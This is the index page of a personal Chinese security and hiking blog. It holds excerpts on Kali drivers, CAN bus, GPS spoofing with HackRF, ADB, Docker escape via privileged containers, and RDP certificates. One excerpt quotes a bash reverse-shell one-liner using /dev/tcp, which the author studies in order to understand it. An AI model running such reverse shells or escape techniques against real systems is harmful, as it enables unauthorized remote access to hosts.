在野的黄

在野的黄

最新文章

Kali系统安装EDIMAX AC1750驱动

Kali系统安装EDIMAX AC1750驱动

实验室采购了一批EDIMAX AC17500网卡,插上Kali发现无法识别。 这批网卡的型号EDIMAX AC1750又名EW-7833UAC,这是网上搜索到的资料,在官网上仅提供了Fedora和Ubuntu的驱动,且支持的内核版本都比较低。 于是就在网上搜到了这个GitHub项目: GitHub
南太行双岭穿越(下)

南太行双岭穿越(下)

6月9号 根据领队发的轨迹图,今天的路线先是一段爬升,然后在山脊上走很长很长的路,最后是一段长加坡结束路程,全长22公里,累计爬升一千多米。 早餐吃过饭,背上包,在停车场稍做集合,简单清点下人数,开始今天的徒步。先是公路缓上坡,单单是走公路我就已经开始喘气了。走公路一直走到离开南坪村。转变成石阶路,
南太行双岭穿越(上)

南太行双岭穿越(上)

2022年的国庆,我和子凌去了一次南太行,但因疫情原因,只爬到了半山腰就被迫下山了。今年五一本打算出游,但刚换了新公司,五一最终决定在家紧急学习业务技能。今年端午前看到了草履虫发布了南太行的开团帖子,于是毫不犹豫的报了名。并且下单了新装备。 我之前背的神秘农场已经咸鱼卖掉了,手里没有登山包,趁着这次
6
0
3
2024-06-14

总线安全 —— CAN协议和CAN FD协议对比

CAN协议和CAN FD协议的区别主要体现在以下几个方面: 传输速率 CAN协议的最大传输速率为1Mbps。 CAN FD(CAN with Flexible Data-Rate)协议的传输速率则更为灵活,其仲裁比特率最高可达1Mbps(与CAN相同),但数据比特率则能提升至最高8Mbps,大大提高
10
0
4
2024-05-30

Windows下使用GNU Radio和gps-sdr-sim

做GPS欺骗实验前需要准备点东西,一个是GNU Radio,相当于是hackrf的运行库,它提供了hackrf_info、hackrf_transfer这些命令;第二个是gps-sdr-sim这个开源项目,使用广播星历文件生成伪造GPS的信号文件,hackrf只负责发送信号不负责伪造,所以伪造的工作
4
0
3
2024-05-07

ADB调试常用指令

常用的ADB调试指令: 启动和停止ADB服务 adb start-server:启动ADB服务。 adb kill-server:停止ADB服务。 设备连接管理 adb devices:列出所有已连接的Android设备或模拟器。 adb connect <device-ip>:<port>:通过T

容器安全之Docker逃逸

一、危险配置 1. Privileged特权模式 利用条件:容器以特权模式运行 docker run --privileged 以特权模式运行的容器可以访问宿主机上的所有设备。 可以在容器中挂载宿主机的磁盘,然后将根目录切换过去。 2. SYS_ADMIN 利用条件: 以root身份运行容器。 使用

对反弹shell中0>&1的理解

今天在学习反弹shell,遇到一个经典的构造: /bin/bash -i &> /dev/tcp/host/port 0>&1 对语句最后的0>&1我百思不得其解,为什么标准输入重定向到标准输出,攻击端输入的指定就到本机来了呢?标准输入指的是本机键盘输入吗?键盘输入重定向到屏幕不应该就是默认的吗?这
4
0
2
2024-03-13

Wireshark分析RDP服务器专有证书

本文记录一次使用Wireshark分析RDP证书的过程,这次遇到的证书比较特殊,是服务器专有证书(Server Proprietary Certificate),不能直接使用X.509格式的方式查看,当时为了分析这个证书花了不少时间。 下面记录一下分析过程,不想看过程可以直接跳到第三章节看快速判断方

Docker容器识别

想研究的课题是容器的渗透,一大方向就是容器逃逸。那么逃逸前自然需要判断是否处在容器中。那么就需要了解容器有哪些特征。假设进入一台远程服务器,通过何种手段开源判断此环境是否在容器之中。 容器虚拟技术有很多,最主流的就是Docker,也比较方便搭建实验环境。所以就先研究Docker的容器特征。手边刚好有
阅读更多